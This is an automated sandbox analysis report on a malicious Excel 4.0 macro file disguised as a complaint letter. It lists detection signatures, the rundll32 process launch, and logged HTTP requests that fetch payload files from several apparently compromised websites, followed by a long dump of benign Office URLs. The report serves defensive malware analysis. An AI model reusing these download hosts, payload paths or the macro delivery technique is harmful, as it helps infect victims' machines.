Analysis Report Complaint_Letter_1186814227-02192021.xls

Overview

General Information

Sample Name: Complaint_Letter_1186814227-02192021.xls
Analysis ID: 356762
MD5: 888909141f8ad83f4509703b1bae7187
SHA1: dab7c94aff5dbeabebf9d85c6b2e7f6e6ba98e18
SHA256: f11a1405772bbb1aa0d1e55fc2faa77fe8a5541894e9617fbd8e6430c9e38731
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 159.89.174.35:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.126.100.34:443 -> 192.168.2.4:49737 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: parama-college.id
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.4:49733 -> 159.89.174.35:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 203.142.76.236:80

Networking:

barindex
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /yxpmmmg/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: parama-college.idConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zdmqwymhhza/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raivens.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hmffuzbolyio/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sportsmarquee.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /focahjqevd/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: erp.demosoftware.bizConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gvazzbwlvyk/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jayshreewoods.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /yxpmmmg/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: parama-college.idConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zdmqwymhhza/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raivens.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hmffuzbolyio/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sportsmarquee.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /focahjqevd/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: erp.demosoftware.bizConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gvazzbwlvyk/44250683266319400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jayshreewoods.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: parama-college.id
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 15:23:56 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://sportsmarquee.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: cxssh_status=off; expires=Thu, 03-Jun-2021 15:23:56 GMT; Max-Age=8640000; path=/Keep-Alive: timeout=5, max=1000Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 53 70 6f 72 74 73 20 4d 61 72 71 75 65 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 73 6d 61 72 74 2d 63 6f 75 70 6f 6e 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 73 6d 61 72 74 2d 63 6f 75 70 6f 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 31 2e 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 66 6f 72 6d 69 64 61 62 6c 65 2f 63 73 73 2f 66 6f 72 6d 69 64 61 62 6c 65 66 6f 72 6d 73 2e 63 73 73 3f 76 65 72 3d 31 31 31 34 31 36 31 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 35 2e 33 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70 6f 72 74 73 6d 61 72 71 75 65 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 70 61 63 6b 61 67 65 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 62 6c 6f 63 6b 73 2f 62 75 69 6c 64 2f 76 65 6e 64 6f 72 73 2d 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 33 2e 36 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 70
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.aadrm.com/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.cortana.ai
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.diagnostics.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.office.net
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.onedrive.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://augloop.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://augloop.office.com/v2
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://cdn.entity.
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://clients.config.office.net/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://config.edge.skype.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://cortana.ai
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://cortana.ai/api
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://cr.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://dev.cortana.ai
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://devnull.onenote.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://directory.services.
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://graph.ppe.windows.net
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://graph.windows.net
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://graph.windows.net/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://lifecycle.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://login.microsoftonline.com/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://login.windows.local
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://management.azure.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://management.azure.com/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://messaging.office.com/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://ncus-000.contentsync.
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://officeapps.live.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://onedrive.live.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://outlook.office.com/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://outlook.office365.com/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://powerlift.acompli.net
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://settings.outlook.com
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://staging.cortana.ai
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: AC73CBBE-DA25-4A70-8E2D-32FC9C1340A0.1.dr String found in binary or memory: https://store.office.com/addinstemplate
